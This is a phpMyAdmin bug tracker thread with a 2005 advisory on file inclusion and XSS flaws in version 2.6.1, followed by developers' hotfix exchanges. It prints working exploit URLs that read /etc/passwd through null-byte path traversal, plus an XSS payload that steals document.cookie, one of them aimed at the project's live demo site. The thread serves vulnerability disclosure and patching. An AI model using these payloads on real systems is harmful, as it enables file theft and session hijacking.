#1609 (in 2.6.1-pl1) Remote file inclusion

[Maksymilian Arciemowicz]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4]

Author: cXIb8O3
Date: 21.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Remote file inclusion ---

1.0

This bug exist in css/phpmyadmin.css.php. You can
include files. Error exist in

Code:
- ------
$tmp_file = $GLOBALS['cfg']['ThemePath'] . '/' .
$theme . '/css/theme_right.css.php';
if (@file_exists($tmp_file)) {
include($tmp_file);
} // end of include theme_right.css.php
- ------

And now you can get files.

For exemple:

http://\[HOST]/[DIR]/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

1.1
Or next include is in libraries/database_interface.lib.php

Code:

- ---
18# require_once('./libraries/dbi/' .
$cfg['Server']['extension'] . '.dbi.lib.php');
- ---

For exemple:

http://\[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3

Error message :
- ---------------
Warning: main(./libraries/dbi/cXIb8O3.dbi.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18

Fatal error: main() [function.require]: Failed opening
required './libraries/dbi/cXIb8O3.dbi.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/database_interface.lib.php
on line 18
- ---------------

Or if you want and if you see php error, can you make
xss with php buq. For Exemple:

http://\[HOST]/[DIR]/libraries/database_interface.lib.php?cfg[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E

- --- 2. How to fix ---

Download the new version of the script or update.

- --- 3. Greets ---

sp3x.

i need help.. :(

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCG5WfznmvyJCR4zQRAjwxAJ9iJkCGyD5HPMCbOjYb1WdR9HEcdwCgkHLO
2FuB5Nqz2rMTa1b26PMgzrk=
=oyWn
-----END PGP SIGNATURE-----

[Alexander M. Turek]

Logged In: YES
user_id=418833

Bug confirmed.

[Alexander M. Turek]

Logged In: YES
user_id=418833

Maksymilian,

Thank you for your report.

Could you please give the attached file a try? It's a
modified version of "libraries/grab_globals.lib.php" that
contains a hotfix against your exploit.

[Maksymilian Arciemowicz]

Logged In: YES
user_id=1225357

/css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X

[Maksymilian Arciemowicz]

Logged In: YES
user_id=1225357

/css/phpmyadmin.css.php?js_frame=print&theme=/etc/passwd%00&&GLOBALS[cfg][ThemePath]=X
in my machine bug exist with this
libraries/grab_globals.lib.php. Varible $theme

[Alexander M. Turek]

Logged In: YES
user_id=418833

OK, I misses to catch $GLOBALS. Please try the attached
revision of grab_globals.lib.php.

[Alexander M. Turek]

[Maksymilian Arciemowicz]

Logged In: YES
user_id=1225357

ok ;] is good but now xss... check.. this xss..

[Alexander M. Turek]

Logged In: YES
user_id=418833

> ok ;]

OK then, let's consider this as fixed for now, although I
don't like the way I did it. ;-)

> is good but now xss... check.. this xss..

Hey, I'm doing this in my freetime, buddy. On top of that, I
don't want to fail my computer science exam, tomorrow. Don't
rush me. :-)

[Maksymilian Arciemowicz]

Logged In: YES
user_id=1225357

i sit in my i386 18/24 H . Is 2.6.2 final? I see only 2.6.1
relase. And this bug is critical because many server have
phpMyAdmin... i am waiting for a new version with patch :)

[Alexander M. Turek]

Logged In: YES
user_id=418833

No, 2.6.2 is far away from being final. I think, this bug
will force us to have a 2.6.1-pl1 release.

If you need a quick fix, you can use the patched
grab_globals.lib.php or checkout the QA_2_6_1 branch from CVS.

[Marc Delisle]

Logged In: YES
user_id=210714

I cannot reproduce the XSS problem with your exploit,
using unpatched phpMyAdmin 2.6.1.
To work, it should display a message between <h1></h1> ?
I don't see this happening.

[Maksymilian Arciemowicz]

Logged In: YES
user_id=1225357

http://www.phpmyadmin.net/phpMyAdmin/libraries/database_interface.lib.php?cfg\[Server][extension]=%3Ch1%3EHi.%20I%20am%20cXIb8O3%3C/h1%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

[Alexander M. Turek]

Logged In: YES
user_id=418833

Maksymilian,

our CVS demo is outdated because of cron job problems at SF.
This one should be more up to date:

http://rabus.phpmyadmin.net/demos/CVS_LATEST

By the way, we are still waiting for an answer from you to
bug #1149383. :-)